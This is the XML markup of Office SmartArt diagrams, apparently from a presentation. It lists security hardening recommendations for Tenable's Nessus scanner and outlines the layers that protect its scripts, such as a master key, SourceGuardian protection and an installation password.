    <dgm:pt modelId="{195BBE15-3FBC-4394-8268-C5F98E894DDA}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Always sign a non-disclosure agreement with all companies providing security software/services.</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{60616DAD-BAB6-4CD5-9E64-99672A060D7B}" type="parTrans" cxnId="{28628E7D-F647-4EC9-BF2C-3A17A44BFF34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{74D41A34-6273-44BF-9554-DDE32C5184B7}" type="sibTrans" cxnId="{28628E7D-F647-4EC9-BF2C-3A17A44BFF34}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{26265474-55F0-4B40-AD19-DEB96C7742EE}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Do not create an SSH user for credentialed checks on the server running Nessus</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{0F22202F-811B-4773-A5F4-49EC52CF1AA2}" type="parTrans" cxnId="{D09523A8-4A9A-48B4-8EB5-58390044FD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{CC31D1AE-0B33-49FA-98A0-6E06BA20AF64}" type="sibTrans" cxnId="{D09523A8-4A9A-48B4-8EB5-58390044FD49}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F249A308-2C0A-45A4-A25E-FBED2D1255F3}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Implement more efficient protection of databases and files uploaded by users</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{89E8B6F5-7D46-4922-AF9C-3654FB67C9CD}" type="parTrans" cxnId="{64DF8ABA-9896-458C-85D9-E422D764D5BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A4A29E2B-2CCC-4B37-9363-45A18928875B}" type="sibTrans" cxnId="{64DF8ABA-9896-458C-85D9-E422D764D5BB}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8DE3E0C2-940A-4E23-95C8-0095E289173F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Disable run any command from audit files (can be enabled only from console) by default </a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{7BCF2A6A-E610-4E6B-B54F-7B713843376B}" type="parTrans" cxnId="{4C14C05F-7117-4915-A54B-1E811404F059}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B21A640D-2647-452C-8DDB-E72881BCF225}" type="sibTrans" cxnId="{4C14C05F-7117-4915-A54B-1E811404F059}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{2BF3B9AB-450B-4625-8C3C-D335F97B1C29}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Delete the option of disabling signature checks in the Nessus web interface</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{5799B439-D697-42D4-BD0A-FC189ECE753A}" type="parTrans" cxnId="{8216A5DA-C92E-44ED-B2BA-51243F216468}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{8806E9BC-6052-4F06-A6EE-59E8EAFA99DD}" type="sibTrans" cxnId="{8216A5DA-C92E-44ED-B2BA-51243F216468}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{AC7003F3-522E-4931-AD36-1601021B3274}">
      <dgm:prSet phldrT="[Text]"/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Encrypt all backup files</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{F38EF0C6-0AC7-4DAD-A8F5-316316C4B790}" type="parTrans" cxnId="{BF6CFABE-A699-4CA5-A367-34B4FC30EF68}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{156EEC3F-CD11-4490-95D5-B9AA51A1248D}" type="sibTrans" cxnId="{BF6CFABE-A699-4CA5-A367-34B4FC30EF68}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{A5DECA52-77B3-4D5C-AAAF-C4F64AA54466}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Establish a red team for penetration testing 24/7</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{4D75532F-67FB-47B0-A2A6-CD4AD77263B7}" type="parTrans" cxnId="{319A6B80-6954-4460-82D9-1D366635301F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C3C09ED9-F422-4D03-AD49-A609AE208BEA}" type="sibTrans" cxnId="{319A6B80-6954-4460-82D9-1D366635301F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{B91B2815-9C8C-4FA7-B92F-75A19750E9B8}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:r>
            <a:rPr lang="en-US" dirty="0"/>
            <a:t>Secure all backend scripts</a:t>
          </a:r>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{DA1B5389-2764-4E0D-B586-362B837BF76A}" type="parTrans" cxnId="{C57C94A8-158C-4BD7-874C-568CA56E4A0F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{076F5BB9-BCEC-42CD-A1B6-06A1B62B1AE1}" type="sibTrans" cxnId="{C57C94A8-158C-4BD7-874C-568CA56E4A0F}">
      <dgm:prSet/>
      <dgm:spPr/>
      <dgm:t>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:endParaRPr lang="en-US"/>
        </a:p>
      </dgm:t>
    </dgm:pt>
    <dgm:pt modelId="{C9AF4ACB-373F-4194-AB9C-BAB66D578A07}" type="pres">
      <dgm:prSet presAssocID="{ADEBD13F-DE8B-4E1A-893A-EB0A2BA41FC6}" presName="Name0" presStyleCnt="0">
        <dgm:presLayoutVars>
          <dgm:dir/>
          <dgm:animLvl val="lvl"/>
          <dgm:resizeHandles val="exact"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{9342FE26-46F0-44C6-8830-2D2DA1ADF37D}" type="pres">
      <dgm:prSet presAssocID="{BA206D65-9B26-4C99-AFD9-ED4FDE11F248}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{85FB59D0-07C6-4E01-8C45-8BD436CAC93C}" type="pres">
      <dgm:prSet presAssocID="{BA206D65-9B26-4C99-AFD9-ED4FDE11F24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2F76C32-2A75-4BAF-95AC-022677BC2552}" type="pres">
      <dgm:prSet presAssocID="{BA206D65-9B26-4C99-AFD9-ED4FDE11F248}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="0" presStyleCnt="2">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{BE216E40-2E66-49FF-B303-A65D368BE2E9}" type="pres">
      <dgm:prSet presAssocID="{D7A7F37C-109E-4925-9B9A-50C5ED844EA5}" presName="space" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{D44D57ED-9279-4E17-82A4-34CB099CD718}" type="pres">
      <dgm:prSet presAssocID="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" presName="composite" presStyleCnt="0"/>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{EE6152DE-204E-40E7-8D57-829CA3965BB6}" type="pres">
      <dgm:prSet presAssocID="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" presName="parTx" presStyleLbl="alignNode1" presStyleIdx="1" presStyleCnt="2" custScaleX="108449">
        <dgm:presLayoutVars>
          <dgm:chMax val="0"/>
          <dgm:chPref val="0"/>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
    <dgm:pt modelId="{5DEF33AB-78B6-4952-8D75-95D15C573133}" type="pres">
      <dgm:prSet presAssocID="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" presName="desTx" presStyleLbl="alignAccFollowNode1" presStyleIdx="1" presStyleCnt="2" custScaleX="108449">
        <dgm:presLayoutVars>
          <dgm:bulletEnabled val="1"/>
        </dgm:presLayoutVars>
      </dgm:prSet>
      <dgm:spPr/>
    </dgm:pt>
  </dgm:ptLst>
  <dgm:cxnLst>
    <dgm:cxn modelId="{05F78B01-5A25-42BF-BE6E-112F8696592B}" type="presOf" srcId="{AC7003F3-522E-4931-AD36-1601021B3274}" destId="{5DEF33AB-78B6-4952-8D75-95D15C573133}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{8189331B-EC5D-43A7-BE73-F869BEA27296}" type="presOf" srcId="{4D183FC4-5C2B-456E-8623-86AE19017CFC}" destId="{5DEF33AB-78B6-4952-8D75-95D15C573133}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{00C3F224-AA0F-4BC3-8BC1-E959B35D3A68}" srcId="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" destId="{FC633840-3CFC-4B57-BBB8-317C633215CC}" srcOrd="2" destOrd="0" parTransId="{EAE706AA-F63D-4325-9878-A0760866B9DC}" sibTransId="{1FA58D0A-58BE-4EA7-B8F8-1F89622E6B46}"/>
    <dgm:cxn modelId="{430CDF2D-37D8-4655-ACE9-3DB3E35AE355}" srcId="{ADEBD13F-DE8B-4E1A-893A-EB0A2BA41FC6}" destId="{BA206D65-9B26-4C99-AFD9-ED4FDE11F248}" srcOrd="0" destOrd="0" parTransId="{6A6AF91A-B278-4127-8DF1-629E93126466}" sibTransId="{D7A7F37C-109E-4925-9B9A-50C5ED844EA5}"/>
    <dgm:cxn modelId="{51F37B39-F415-472D-812B-43D46E999219}" type="presOf" srcId="{F249A308-2C0A-45A4-A25E-FBED2D1255F3}" destId="{52F76C32-2A75-4BAF-95AC-022677BC2552}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{4C14C05F-7117-4915-A54B-1E811404F059}" srcId="{BA206D65-9B26-4C99-AFD9-ED4FDE11F248}" destId="{8DE3E0C2-940A-4E23-95C8-0095E289173F}" srcOrd="2" destOrd="0" parTransId="{7BCF2A6A-E610-4E6B-B54F-7B713843376B}" sibTransId="{B21A640D-2647-452C-8DDB-E72881BCF225}"/>
    <dgm:cxn modelId="{FF504864-60D9-4AA7-AB2C-524D93554F8E}" srcId="{BA206D65-9B26-4C99-AFD9-ED4FDE11F248}" destId="{2FB5F284-544F-444B-9232-542C1676512B}" srcOrd="0" destOrd="0" parTransId="{FF8A95F5-A4FB-4E65-9AB4-B2C374748063}" sibTransId="{E1691290-6727-4F0B-BFC2-38AF332AF75F}"/>
    <dgm:cxn modelId="{FCFBAD47-167D-4B42-9958-F4E905CA7D5C}" type="presOf" srcId="{BA206D65-9B26-4C99-AFD9-ED4FDE11F248}" destId="{85FB59D0-07C6-4E01-8C45-8BD436CAC93C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{64F1AD4B-4D72-4220-9EA5-76AA6EB0EF42}" srcId="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" destId="{4D183FC4-5C2B-456E-8623-86AE19017CFC}" srcOrd="3" destOrd="0" parTransId="{A0D3873C-DD4F-4D00-A310-1444008603E2}" sibTransId="{37720219-77B1-4022-9A9C-19D4B4E16975}"/>
    <dgm:cxn modelId="{F4226451-95DB-447F-A141-A08BD640EC89}" type="presOf" srcId="{8DE3E0C2-940A-4E23-95C8-0095E289173F}" destId="{52F76C32-2A75-4BAF-95AC-022677BC2552}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{202C1057-035F-456B-B8FD-134BD58F3AE9}" type="presOf" srcId="{2FB5F284-544F-444B-9232-542C1676512B}" destId="{52F76C32-2A75-4BAF-95AC-022677BC2552}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{198A397C-6FCB-4390-991B-40C94268B364}" type="presOf" srcId="{A5DECA52-77B3-4D5C-AAAF-C4F64AA54466}" destId="{5DEF33AB-78B6-4952-8D75-95D15C573133}" srcOrd="0" destOrd="6" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{28628E7D-F647-4EC9-BF2C-3A17A44BFF34}" srcId="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" destId="{195BBE15-3FBC-4394-8268-C5F98E894DDA}" srcOrd="4" destOrd="0" parTransId="{60616DAD-BAB6-4CD5-9E64-99672A060D7B}" sibTransId="{74D41A34-6273-44BF-9554-DDE32C5184B7}"/>
    <dgm:cxn modelId="{319A6B80-6954-4460-82D9-1D366635301F}" srcId="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" destId="{A5DECA52-77B3-4D5C-AAAF-C4F64AA54466}" srcOrd="6" destOrd="0" parTransId="{4D75532F-67FB-47B0-A2A6-CD4AD77263B7}" sibTransId="{C3C09ED9-F422-4D03-AD49-A609AE208BEA}"/>
    <dgm:cxn modelId="{9923FC91-A82B-4813-9E1B-1A5052DC8684}" type="presOf" srcId="{FC633840-3CFC-4B57-BBB8-317C633215CC}" destId="{5DEF33AB-78B6-4952-8D75-95D15C573133}" srcOrd="0" destOrd="2" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{A636679C-2A54-4594-B19B-9E60B39932BE}" type="presOf" srcId="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" destId="{EE6152DE-204E-40E7-8D57-829CA3965BB6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{DF6FDCA6-4DDE-48A3-BCDC-DDCE6E2D481B}" type="presOf" srcId="{2BF3B9AB-450B-4625-8C3C-D335F97B1C29}" destId="{52F76C32-2A75-4BAF-95AC-022677BC2552}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{A8E9F6A6-85D9-43DC-8569-CE6D384C6389}" type="presOf" srcId="{195BBE15-3FBC-4394-8268-C5F98E894DDA}" destId="{5DEF33AB-78B6-4952-8D75-95D15C573133}" srcOrd="0" destOrd="4" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{D09523A8-4A9A-48B4-8EB5-58390044FD49}" srcId="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" destId="{26265474-55F0-4B40-AD19-DEB96C7742EE}" srcOrd="5" destOrd="0" parTransId="{0F22202F-811B-4773-A5F4-49EC52CF1AA2}" sibTransId="{CC31D1AE-0B33-49FA-98A0-6E06BA20AF64}"/>
    <dgm:cxn modelId="{C57C94A8-158C-4BD7-874C-568CA56E4A0F}" srcId="{BA206D65-9B26-4C99-AFD9-ED4FDE11F248}" destId="{B91B2815-9C8C-4FA7-B92F-75A19750E9B8}" srcOrd="3" destOrd="0" parTransId="{DA1B5389-2764-4E0D-B586-362B837BF76A}" sibTransId="{076F5BB9-BCEC-42CD-A1B6-06A1B62B1AE1}"/>
    <dgm:cxn modelId="{64DF8ABA-9896-458C-85D9-E422D764D5BB}" srcId="{BA206D65-9B26-4C99-AFD9-ED4FDE11F248}" destId="{F249A308-2C0A-45A4-A25E-FBED2D1255F3}" srcOrd="1" destOrd="0" parTransId="{89E8B6F5-7D46-4922-AF9C-3654FB67C9CD}" sibTransId="{A4A29E2B-2CCC-4B37-9363-45A18928875B}"/>
    <dgm:cxn modelId="{BF6CFABE-A699-4CA5-A367-34B4FC30EF68}" srcId="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" destId="{AC7003F3-522E-4931-AD36-1601021B3274}" srcOrd="0" destOrd="0" parTransId="{F38EF0C6-0AC7-4DAD-A8F5-316316C4B790}" sibTransId="{156EEC3F-CD11-4490-95D5-B9AA51A1248D}"/>
    <dgm:cxn modelId="{3FEF85C4-B1F0-447A-8B81-D586E6E1A6C3}" srcId="{ADEBD13F-DE8B-4E1A-893A-EB0A2BA41FC6}" destId="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" srcOrd="1" destOrd="0" parTransId="{CCFA7460-4C39-45B6-B834-AB9473DC3226}" sibTransId="{617FDA72-291F-4A21-AE37-C09DC7848524}"/>
    <dgm:cxn modelId="{DE3E3BCA-22B3-433F-B466-E87C94A1A77D}" type="presOf" srcId="{26265474-55F0-4B40-AD19-DEB96C7742EE}" destId="{5DEF33AB-78B6-4952-8D75-95D15C573133}" srcOrd="0" destOrd="5" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{8216A5DA-C92E-44ED-B2BA-51243F216468}" srcId="{BA206D65-9B26-4C99-AFD9-ED4FDE11F248}" destId="{2BF3B9AB-450B-4625-8C3C-D335F97B1C29}" srcOrd="4" destOrd="0" parTransId="{5799B439-D697-42D4-BD0A-FC189ECE753A}" sibTransId="{8806E9BC-6052-4F06-A6EE-59E8EAFA99DD}"/>
    <dgm:cxn modelId="{27311FDF-E2BA-40C5-A1F0-49352B4388B2}" type="presOf" srcId="{B91B2815-9C8C-4FA7-B92F-75A19750E9B8}" destId="{52F76C32-2A75-4BAF-95AC-022677BC2552}" srcOrd="0" destOrd="3" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{9878A3E7-46B1-428D-87BB-1EE49C78CF49}" type="presOf" srcId="{E0BE7B4C-7CFE-4EA9-BB60-26B29769782A}" destId="{5DEF33AB-78B6-4952-8D75-95D15C573133}" srcOrd="0" destOrd="1" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{826219E9-AF87-4848-BE2A-196E237BF1D8}" srcId="{5B0A092C-CB6C-4F8F-B066-D1D316302E46}" destId="{E0BE7B4C-7CFE-4EA9-BB60-26B29769782A}" srcOrd="1" destOrd="0" parTransId="{94E07381-31BC-4977-BA35-F5B2228A6FB2}" sibTransId="{091AFC1A-AC03-4753-AEB4-9D2435F6069E}"/>
    <dgm:cxn modelId="{56606CF5-D516-4D3E-B56A-CA61D4D0DA99}" type="presOf" srcId="{ADEBD13F-DE8B-4E1A-893A-EB0A2BA41FC6}" destId="{C9AF4ACB-373F-4194-AB9C-BAB66D578A07}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{9A252BB8-287E-4F91-AF21-82FF41C81F8C}" type="presParOf" srcId="{C9AF4ACB-373F-4194-AB9C-BAB66D578A07}" destId="{9342FE26-46F0-44C6-8830-2D2DA1ADF37D}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{42C25262-5630-4860-AA42-B09D0FDE0CC6}" type="presParOf" srcId="{9342FE26-46F0-44C6-8830-2D2DA1ADF37D}" destId="{85FB59D0-07C6-4E01-8C45-8BD436CAC93C}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{7FC61665-829C-486C-BE9F-0785393795C5}" type="presParOf" srcId="{9342FE26-46F0-44C6-8830-2D2DA1ADF37D}" destId="{52F76C32-2A75-4BAF-95AC-022677BC2552}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{8C0D035D-42C4-4C20-849A-0D2E573C1AEB}" type="presParOf" srcId="{C9AF4ACB-373F-4194-AB9C-BAB66D578A07}" destId="{BE216E40-2E66-49FF-B303-A65D368BE2E9}" srcOrd="1" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{836F4905-F69C-460E-A7ED-589E96DEC1C8}" type="presParOf" srcId="{C9AF4ACB-373F-4194-AB9C-BAB66D578A07}" destId="{D44D57ED-9279-4E17-82A4-34CB099CD718}" srcOrd="2" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{B0999E11-6F9D-46CA-9C49-B94EDEA05FA5}" type="presParOf" srcId="{D44D57ED-9279-4E17-82A4-34CB099CD718}" destId="{EE6152DE-204E-40E7-8D57-829CA3965BB6}" srcOrd="0" destOrd="0" presId="urn:microsoft.com/office/officeart/2005/8/layout/hList1"/>
    <dgm:cxn modelId="{F1FE7002-2759-498E-AF8D-79F27F9732A0}" type="presParOf" srcId="{D44D57ED-9279-4E17-82A4-34CB099CD718}" destId="{5DEF33AB-78B6-4952-8D75-95D15C5731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D0E9A-326B-41B2-9201-BB7C5A7329D7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3109425" y="1970020"/>
          <a:ext cx="1749958" cy="17499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Master key</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3365700" y="2226295"/>
        <a:ext cx="1237408" cy="1237408"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{42453135-6B25-4019-AE05-8D7A2135C0A1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="11978112">
          <a:off x="1667936" y="2028709"/>
          <a:ext cx="1454914" cy="49873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F60A4-1506-4F69-BD21-651D83B45100}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="879007" y="1623966"/>
          <a:ext cx="1662460" cy="8193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Build-in scripts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Protected by </a:t>
          </a:r>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0" err="1"/>
            <a:t>SourceGuardian</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="903004" y="1647963"/>
        <a:ext cx="1614466" cy="771332"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F70659BB-28A1-4AEF-8D1D-27EBF145BB0A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="16200000">
          <a:off x="3313803" y="971991"/>
          <a:ext cx="1341200" cy="49873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903466"/>
            <a:satOff val="-13493"/>
            <a:lumOff val="-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D614E-5E85-47D8-B881-0AD9D9DA9A7B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2824464" y="115721"/>
          <a:ext cx="2319879" cy="870078"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:hueOff val="-1903466"/>
            <a:satOff val="-13493"/>
            <a:lumOff val="-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Hardware-dependent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Protecting execution in controlled environments</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2849948" y="141205"/>
        <a:ext cx="2268911" cy="819110"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{4275E032-E225-497E-9E51-2C461A25B548}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="20524992">
          <a:off x="4865377" y="2059320"/>
          <a:ext cx="1555621" cy="49873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3806931"/>
            <a:satOff val="-26986"/>
            <a:lumOff val="-1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DB17D-AD07-4BBC-A591-1717B0EDF04D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5456606" y="1660861"/>
          <a:ext cx="1853343" cy="817092"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="accent3">
            <a:hueOff val="-3806931"/>
            <a:satOff val="-26986"/>
            <a:lumOff val="-1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Installation stage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Protected by user-defined password</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5480538" y="1684793"/>
        <a:ext cx="1805479" cy="769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59D0-07C6-4E01-8C45-8BD436CAC93C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2889" y="90068"/>
          <a:ext cx="3619291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Tenable</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2889" y="90068"/>
        <a:ext cx="3619291" cy="432000"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{52F76C32-2A75-4BAF-95AC-022677BC2552}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2889" y="522068"/>
          <a:ext cx="3619291" cy="32853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/>
